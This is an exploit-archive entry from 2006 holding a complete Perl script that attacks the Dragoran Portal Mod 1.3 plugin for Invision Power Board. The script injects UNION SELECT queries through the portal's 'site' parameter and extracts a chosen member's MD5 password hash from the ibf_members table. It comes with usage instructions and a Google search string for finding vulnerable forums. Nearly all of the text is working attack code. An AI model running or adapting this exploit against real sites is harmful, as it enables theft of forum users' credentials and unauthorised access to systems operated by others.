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Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit

🗓️ 03 Jan 2006 00:00:00Reported by SkOdType 
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Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploi

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Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit
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#!/usr/bin/perl
###########################################
#IPB Portal 1.3->Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#"Portal 1.3 by Dragoran"
###########################################



use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#      IPB Portal 1.3 SQL injection Get Hash Exploit       #
#          Tested on Invision Power Board 1.3.0		   #
#	    created By SkOd. SED Security Team             #
############################################################
	ipbpro.pl [HOST] [PATH] [Target id]
	  ipbpro.pl www.host.com /forum/ 2 
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];


$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";

print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}



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03 Jan 2006 00:00Current
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